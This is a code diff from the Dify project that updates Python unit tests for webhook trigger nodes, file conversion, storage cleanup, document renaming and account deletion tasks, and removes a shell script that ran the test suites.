assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify file factory was called with correct parameters
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
# Verify segment factory was called to create FileSegment
mock_segment_factory.assert_called_once()
# Verify FileVariable was created with correct parameters
mock_file_variable.assert_called_once()
call_args = mock_file_variable.call_args[1]
assert call_args["name"] == "image_upload"
# value should be whatever build_segment_with_type.value returned
assert call_args["value"] == mock_segment.value
assert call_args["selector"] == ["webhook-node-1", "image_upload"]
# Verify output contains the FileVariable, not the original dict
assert result.outputs["image_upload"] == mock_file_var_instance
assert result.outputs["message"] == "Test message"
def test_webhook_node_file_conversion_with_missing_files():
"""Test webhook node file conversion with missing file parameter."""
data = WebhookData(
title="Test Webhook with Missing File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="missing_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {}, # No files
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify missing file parameter is None
assert result.outputs["_webhook_raw"]["files"] == {}
def test_webhook_node_file_conversion_with_none_file():
"""Test webhook node file conversion with None file value."""
data = WebhookData(
title="Test Webhook with None File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="none_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": None,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify None file parameter is None
assert result.outputs["_webhook_raw"]["files"]["file"] is None
def test_webhook_node_file_conversion_with_non_dict_file():
"""Test webhook node file conversion with non-dict file value."""
data = WebhookData(
title="Test Webhook with Non-Dict File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="wrong_type", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "not_a_dict", # Wrapped to match node expectation
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle non-dict case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original (wrapped) mapping
assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict"
def test_webhook_node_file_conversion_mixed_parameters():
"""Test webhook node with mixed parameter types including files."""
file_dict = create_test_file_dict("mixed_test.jpg")
data = WebhookData(
title="Test Webhook Mixed Parameters",
method=Method.POST,
content_type=ContentType.FORM_DATA,
headers=[],
params=[],
body=[
WebhookBodyParameter(name="text_param", type="string", required=True),
WebhookBodyParameter(name="number_param", type="number", required=False),
WebhookBodyParameter(name="file_param", type="file", required=True),
WebhookBodyParameter(name="bool_param", type="boolean", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {
"text_param": "Hello World",
"number_param": 42,
"bool_param": True,
},
"files": {
"file_param": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks for file
mock_file_obj = Mock()
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var = Mock()
mock_file_variable.return_value = mock_file_var
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify all parameters are present
assert result.outputs["text_param"] == "Hello World"
assert result.outputs["number_param"] == 42
assert result.outputs["bool_param"] is True
assert result.outputs["file_param"] == mock_file_var
# Verify file conversion was called
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
def test_webhook_node_different_file_types():
"""Test webhook node file conversion with different file types."""
image_dict = create_test_file_dict("image.jpg", "image")
data = WebhookData(
title="Test Webhook Different File Types",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image", type="file", required=True),
WebhookBodyParameter(name="document", type="file", required=True),
WebhookBodyParameter(name="video", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"image": image_dict,
"document": create_test_file_dict("document.pdf", "document"),
"video": create_test_file_dict("video.mp4", "video"),
},
}
},
)
node = create_webhook_node(data, variable_pool)
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks for all files
mock_file_objs = [Mock() for _ in range(3)]
mock_segments = [Mock() for _ in range(3)]
mock_file_vars = [Mock() for _ in range(3)]
# Map each segment.value to its corresponding mock file obj
for seg, f in zip(mock_segments, mock_file_objs):
seg.value = f
mock_file_factory.side_effect = mock_file_objs
mock_segment_factory.side_effect = mock_segments
mock_file_variable.side_effect = mock_file_vars
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify all file types were converted
assert mock_file_factory.call_count == 3
assert result.outputs["image"] == mock_file_vars[0]
assert result.outputs["document"] == mock_file_vars[1]
assert result.outputs["video"] == mock_file_vars[2]
def test_webhook_node_file_conversion_with_non_dict_wrapper():
"""Test webhook node file conversion when the file wrapper is not a dict."""
data = WebhookData(
title="Test Webhook with Non-dict File Wrapper",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "just a string",
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Verify successful execution (should not crash)
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original value
assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string"

View File

@ -1,8 +1,10 @@
from unittest.mock import patch
import pytest
from core.app.entities.app_invoke_entities import InvokeFrom
from core.file import File, FileTransferMethod, FileType
from core.variables import StringVariable
from core.variables import FileVariable, StringVariable
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool)
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="1",
config=node_config,
graph_init_params=GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
),
graph_runtime_state=GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
),
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Provide tenant_id for conversion path
runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})()
# Compatibility alias for some nodes referencing `self.node_id`
node.node_id = node.id
return node
@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params():
"query_params": {},
"body": {},
"files": {
"upload": file1,
"document": file2,
"upload": file1.to_dict(),
"document": file2.to_dict(),
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["upload"] == file1
assert result.outputs["document"] == file2
assert result.outputs["missing_file"] is None
assert isinstance(result.outputs["upload"], FileVariable)
assert isinstance(result.outputs["document"], FileVariable)
assert result.outputs["upload"].value.filename == "image.jpg"
def test_webhook_node_run_mixed_parameters():
@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters():
"headers": {"Authorization": "Bearer token"},
"query_params": {"version": "v1"},
"body": {"message": "Test message"},
"files": {"upload": file_obj},
"files": {"upload": file_obj.to_dict()},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["Authorization"] == "Bearer token"
assert result.outputs["version"] == "v1"
assert result.outputs["message"] == "Test message"
assert result.outputs["upload"] == file_obj
assert isinstance(result.outputs["upload"], FileVariable)
assert result.outputs["upload"].value.filename == "test.jpg"
assert "_webhook_raw" in result.outputs

View File

@ -1,3 +1,5 @@
from types import SimpleNamespace
import pytest
from core.file.enums import FileType
@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable
from core.workflow.workflow_entry import WorkflowEntry
@pytest.fixture(autouse=True)
def _mock_ssrf_head(monkeypatch):
"""Avoid any real network requests during tests.
file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect
remote files. We stub it to return a minimal response object with
headers so filename/mime/size can be derived deterministically.
"""
def fake_head(url, *args, **kwargs):
# choose a content-type by file suffix for determinism
if url.endswith(".pdf"):
ctype = "application/pdf"
elif url.endswith(".jpg") or url.endswith(".jpeg"):
ctype = "image/jpeg"
elif url.endswith(".png"):
ctype = "image/png"
else:
ctype = "application/octet-stream"
filename = url.split("/")[-1] or "file.bin"
headers = {
"Content-Type": ctype,
"Content-Disposition": f'attachment; filename="{filename}"',
"Content-Length": "12345",
}
return SimpleNamespace(status_code=200, headers=headers)
monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
class TestWorkflowEntry:
"""Test WorkflowEntry class methods."""

View File

@ -14,7 +14,9 @@ def get_example_bucket() -> str:
def get_opendal_bucket() -> str:
return "./dify"
import os
return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage")
def get_example_filename() -> str:

View File

@ -21,20 +21,16 @@ class TestOpenDAL:
)
@pytest.fixture(scope="class", autouse=True)
def teardown_class(self, request):
def teardown_class(self):
"""Clean up after all tests in the class."""
def cleanup():
folder = Path(get_opendal_bucket())
if folder.exists() and folder.is_dir():
for item in folder.iterdir():
if item.is_file():
item.unlink()
elif item.is_dir():
item.rmdir()
folder.rmdir()
yield
return cleanup()
folder = Path(get_opendal_bucket())
if folder.exists() and folder.is_dir():
import shutil
shutil.rmtree(folder, ignore_errors=True)
def test_save_and_exists(self):
"""Test saving data and checking existence."""

View File

@ -0,0 +1,176 @@
from types import SimpleNamespace
from unittest.mock import Mock, create_autospec, patch
import pytest
from models import Account
from services.dataset_service import DocumentService
@pytest.fixture
def mock_env():
"""Patch dependencies used by DocumentService.rename_document.
Mocks:
- DatasetService.get_dataset
- DocumentService.get_document
- current_user (with current_tenant_id)
- db.session
"""
with (
patch("services.dataset_service.DatasetService.get_dataset") as get_dataset,
patch("services.dataset_service.DocumentService.get_document") as get_document,
patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user,
patch("extensions.ext_database.db.session") as db_session,
):
current_user.current_tenant_id = "tenant-123"
yield {
"get_dataset": get_dataset,
"get_document": get_document,
"current_user": current_user,
"db_session": db_session,
}
def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False):
return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled)
def make_document(
document_id="document-123",
dataset_id="dataset-123",
tenant_id="tenant-123",
name="Old Name",
data_source_info=None,
doc_metadata=None,
):
doc = Mock()
doc.id = document_id
doc.dataset_id = dataset_id
doc.tenant_id = tenant_id
doc.name = name
doc.data_source_info = data_source_info or {}
# property-like usage in code relies on a dict
doc.data_source_info_dict = dict(doc.data_source_info)
doc.doc_metadata = dict(doc_metadata or {})
return doc
def test_rename_document_success(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "New Document Name"
dataset = make_dataset(dataset_id)
document = make_document(document_id=document_id, dataset_id=dataset_id)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
result = DocumentService.rename_document(dataset_id, document_id, new_name)
assert result is document
assert document.name == new_name
mock_env["db_session"].add.assert_called_once_with(document)
mock_env["db_session"].commit.assert_called_once()
def test_rename_document_with_built_in_fields(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Renamed"
dataset = make_dataset(dataset_id, built_in_field_enabled=True)
document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"})
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
# BuiltInField.document_name == "document_name" in service code
assert document.doc_metadata["document_name"] == new_name
assert document.doc_metadata["foo"] == "bar"
def test_rename_document_updates_upload_file_when_present(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Renamed"
file_id = "file-123"
dataset = make_dataset(dataset_id)
document = make_document(
document_id=document_id,
dataset_id=dataset_id,
data_source_info={"upload_file_id": file_id},
)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
# Intercept UploadFile rename UPDATE chain
mock_query = Mock()
mock_query.where.return_value = mock_query
mock_env["db_session"].query.return_value = mock_query
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
mock_env["db_session"].query.assert_called() # update executed
def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env):
"""
When data_source_info_dict exists but does not contain "upload_file_id",
UploadFile should not be updated.
"""
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Another Name"
dataset = make_dataset(dataset_id)
# Ensure data_source_info_dict is truthy but lacks the key
document = make_document(
document_id=document_id,
dataset_id=dataset_id,
data_source_info={"url": "https://example.com"},
)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
# Should NOT attempt to update UploadFile
mock_env["db_session"].query.assert_not_called()
def test_rename_document_dataset_not_found(mock_env):
mock_env["get_dataset"].return_value = None
with pytest.raises(ValueError, match="Dataset not found"):
DocumentService.rename_document("missing", "doc", "x")
def test_rename_document_not_found(mock_env):
dataset = make_dataset("dataset-123")
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = None
with pytest.raises(ValueError, match="Document not found"):
DocumentService.rename_document(dataset.id, "missing", "x")
def test_rename_document_permission_denied_when_tenant_mismatch(mock_env):
dataset = make_dataset("dataset-123")
# different tenant than current_user.current_tenant_id
document = make_document(dataset_id=dataset.id, tenant_id="tenant-other")
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
with pytest.raises(ValueError, match="No permission"):
DocumentService.rename_document(dataset.id, document.id, "x")

View File

@ -82,19 +82,19 @@ class TestWebhookServiceUnit:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
with patch.object(WebhookService, "_process_file_uploads") as mock_process_files:
mock_process_files.return_value = {"upload": "mocked_file_obj"}
mock_process_files.return_value = {"file": "mocked_file_obj"}
webhook_data = WebhookService.extract_webhook_data(webhook_trigger)
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert webhook_data["files"]["upload"] == "mocked_file_obj"
assert webhook_data["files"]["file"] == "mocked_file_obj"
mock_process_files.assert_called_once()
def test_extract_webhook_data_raw_text(self):

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,112 @@
"""
Unit tests for delete_account_task.
Covers:
- Billing enabled with existing account: calls billing and sends success email
- Billing disabled with existing account: skips billing, sends success email
- Account not found: still calls billing when enabled, does not send email
- Billing deletion raises: logs and re-raises, no email
"""
from types import SimpleNamespace
from unittest.mock import MagicMock, patch
import pytest
from tasks.delete_account_task import delete_account_task
@pytest.fixture
def mock_db_session():
"""Mock the db.session used in delete_account_task."""
with patch("tasks.delete_account_task.db.session") as mock_session:
mock_query = MagicMock()
mock_session.query.return_value = mock_query
mock_query.where.return_value = mock_query
yield mock_session
@pytest.fixture
def mock_deps():
"""Patch external dependencies: BillingService and send_deletion_success_task."""
with (
patch("tasks.delete_account_task.BillingService") as mock_billing,
patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task,
):
# ensure .delay exists on the mail task
mock_mail_task.delay = MagicMock()
yield {
"billing": mock_billing,
"mail_task": mock_mail_task,
}
def _set_account_found(mock_db_session, email: str = "user@example.com"):
account = SimpleNamespace(email=email)
mock_db_session.query.return_value.where.return_value.first.return_value = account
return account
def _set_account_missing(mock_db_session):
mock_db_session.query.return_value.where.return_value.first.return_value = None
class TestDeleteAccountTask:
def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps):
# Arrange
account_id = "acc-123"
account = _set_account_found(mock_db_session, email="a@b.com")
# Enable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True):
# Act
delete_account_task(account_id)
# Assert
mock_deps["billing"].delete_account.assert_called_once_with(account_id)
mock_deps["mail_task"].delay.assert_called_once_with(account.email)
def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps):
# Arrange
account_id = "acc-456"
account = _set_account_found(mock_db_session, email="x@y.com")
# Disable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False):
# Act
delete_account_task(account_id)
# Assert
mock_deps["billing"].delete_account.assert_not_called()
mock_deps["mail_task"].delay.assert_called_once_with(account.email)
def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog):
# Arrange
account_id = "missing-id"
_set_account_missing(mock_db_session)
# Enable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True):
# Act
delete_account_task(account_id)
# Assert
mock_deps["billing"].delete_account.assert_called_once_with(account_id)
mock_deps["mail_task"].delay.assert_not_called()
# Optional: verify log contains not found message
assert any("not found" in rec.getMessage().lower() for rec in caplog.records)
def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps):
# Arrange
account_id = "acc-err"
_set_account_found(mock_db_session, email="err@ex.com")
mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down")
# Enable billing
with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True):
# Act & Assert
with pytest.raises(RuntimeError):
delete_account_task(account_id)
# Ensure email was not sent
mock_deps["mail_task"].delay.assert_not_called()

File diff suppressed because it is too large Load Diff

View File

@ -1,20 +0,0 @@
#!/bin/bash
set -x
SCRIPT_DIR="$(dirname "$(realpath "$0")")"
cd "$SCRIPT_DIR/../.."
# ModelRuntime
dev/pytest/pytest_model_runtime.sh
# Tools
dev/pytest/pytest_tools.sh
# Workflow
dev/pytest/pytest_workflow.sh
# Unit tests
dev/pytest/pytest_unit_tests.sh
# TestContainers tests
dev/pytest/pytest_testcontainers.sh

Some files were not shown because too many files have changed in this diff Show More